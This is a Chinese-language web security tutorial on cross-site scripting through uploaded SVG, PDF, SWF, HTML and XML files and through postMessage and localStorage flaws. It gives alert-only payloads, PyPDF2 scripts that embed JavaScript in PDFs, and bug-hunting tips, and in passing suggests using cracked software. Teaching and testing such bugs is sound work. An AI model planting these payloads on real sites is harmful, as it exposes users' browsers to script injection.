Web攻防-XSS跨站文件类型功能逻辑SVGPDFSWFHTMLXMLPMessageLocalStorage
知识点:
1、Web攻防-XSS跨站-文件类型-html&pdf&swf&svg&xml
2、Web攻防-XSS跨站-功能逻辑-postMessage&localStorage
一、演示案例-WEB攻防-XSS跨站-文件类型触发XSS-SVG&PDF&SWF&HTML&XML等
1、SVG-XSS
SVG(Scalable Vector Graphics)
是一种基于XML
的二维矢量图格式,和我们平常用的jpg/png
等图片格式所不同的是SVG
图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开SVG
图片并且编辑它,目前主流的浏览器都已经支持SVG
图片的渲染。
<svg xmlns="http://www.w3.org/2000/svg" version="1.1"><circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" /><script>alert(1)</script>
</svg>
通过文件上传功能上传一个SVG
文件(该文件已经提前植入XSS
代码),然后在访问这个上传后的svg
地址即可触发上图效果
2、PDF-XSS
制作工具:迅捷PDF编辑器试用版
(最好网上找破解版,然后导入其他正常的pdf
,在正常的pdf
插入js
动作)
1、创建PDF
,加入动作JS
2、通过文件上传获取直链
3、直链地址访问后被触发
利用python创建一个含有XSS的PDF文件
from PyPDF2 import PdfReader, PdfWriter
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 添加一个新页面
page = output_pdf.add_blank_page(width=72, height=72)
# 添加js代码
output_pdf.add_js("app.alert('123');")
# 将新页面写入到新 PDF 文档中
with open("xss.pdf", "wb") as f:output_pdf.write(f)
使用python3
运行这个python
文件即可在当前目录下生成一个XSS.pdf
文件,用浏览器打开这个pdf
即可触发js
代码
参考地址:https://www.bmabk.com/index.php/post/151955.html
和正常PDF绑定from PyPDF2 import PdfReader, PdfWriter
# 打开原始 22.PDF 文件
input_pdf = PdfReader("22.pdf")
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 将现有的 PDF 页面复制到新文档
for i in range(len(input_pdf.pages)):output_pdf.add_page(input_pdf.pages[i])
# 添加 javaScript 代码
output_pdf.add_js("app.alert('123');")
# 将新 PDF 文档写入到文件中
with open("xssplus.pdf", "wb") as f:output_pdf.write(f)提前准备好一个22.pdf文件,与当前py脚本放在同一个目录下,运行该py脚本即可在当前目录下生成一个xssplus.pdf
3、SWF-XSS
制作工具:Adobe Flash Professional CS6
1、新建swf
文件(SWF
文件是Flash
动画文件格式)
2、F9
进入代码区域
3、属性发布设置解析(root
指当前swf
文件)
//取m参数
var m=_root.m;
//调用html中Javascript中的m参数值
flash.external.ExternalInterface.call(m);
触发:?m=alert(/xss/)
实战中如何利用
1.通过文件上传自己制作的swf
文件然后去访问执行
2、找到目标上存在的swf
文件进行反编译后搜索关键字找xss
漏洞
反编译项目:JPEXS Free Flash Decompiler
用JPEXS Free Flash Decompiler
工具打开这个swf
文件
测试swf
文件xss
安全性:
1、反编译swf
文件
2、查找触发危险函数
3、找可控参数访问触发
xss
一是指执行恶意js
,那么为什么说flash xss
呢?是因为flash
有可以调用js
的函数,也就是可以和js
通信,因此这些函数如果使用不当就会造成xss
。常见的可触发xss
的危险函数有:getURL,navigateToURL,ExternalInterface.call(最多),htmlText,loadMovie
等等
4、HTML-XSS
单纯在HTML代码中写XSS代码即可
<script>alert(123)</script>
5、XML-XSS
XML
文件本身不能执行JavaScript
代码,XML
中可以加载外部的资源方式来触发XSS
。
流程:通过文件上传上传x.xml
文件,得到x.xml
文件路径,然后在上传一个xss.xml
文件,代码中指向x.xml
文件的路径,浏览器访问xss.xml
就会触发x.xml
中的xss
。
创建一个x.xml文件,内容如下:
<?xml version="1.0" encoding="iso-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
<script>alert(/xss/);</script>
</body></html>
</xsl:template>
</xsl:stylesheet>
然后对其进行引用:
创建一个xss.xml文件,内容如下:
<?xml version="1.0" encoding="iso-8859-1"?>
<?xml-stylesheet type="text/xsl" href="http://127.0.0.1/x.xml"?>
<test></test>
二、演示案例-WEB攻防-XSS跨站-功能逻辑触发XSS-PostMessage&LocalStorage
1、PostMessage XSS
一个用于在网页间安全地发送消息的浏览器API
。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging
),这在一些复杂的网页应用和浏览器插件中非常有用。
安全原因:当发送参数可控且接收方处理不当时,将导致XSS
模拟漏洞挖掘场景
打开http://192.168.1.4:82/60/receive.html
分析源码
根据页面源码写一个xss.html
文件上传上去来控制msg
触发XSS
黑盒挖掘
如何去挖这种隐藏比较深的漏洞,这里强推一个国外白帽写的谷歌浏览器插件:
https://github.com/fransr/postMessage-tracker安装之后,只要是当前页面创建了message事件监听,这个插件就会定位到其代码。
白盒挖掘
找代码中此操作类函数及关键字分析
复盘:https://mp.weixin.qq.com/s/M5YIkJEoHZK6_I7nK6aj5w
2、localStorage型xss(存储型Xss升级版)
Web
应用使用localStorage
在用户浏览器中存储数据。localStorage
允许网页在本地存储键值对,这些数据可以在浏览器关闭后仍然保留,并且在同一域名下的不同页面之间共享。当应用程序从localStorage
中读取数据并将其显示在页面上时,如果没有对数据进行充分的验证和过滤,攻击者就有可能通过修改localStorage
中的数据来注入恶意脚本实现XSS
。
安全原因:当localStorage可控且有页面有操作其数据,将导致XSS
黑盒挖掘:寻找输入点(如表单、搜索框、评论区等),构造测试用例找页面调用
白盒挖掘:查找与localStorage相关的代码段分析数据存储及数据读取
挖掘:先看目标应用localStorage
1、先找能控制的键名键值(怎么找)
2、再找对键名键值做输出操作(怎么找)
或者也可以从js
里搜索userData
关键字找谁调用了这个值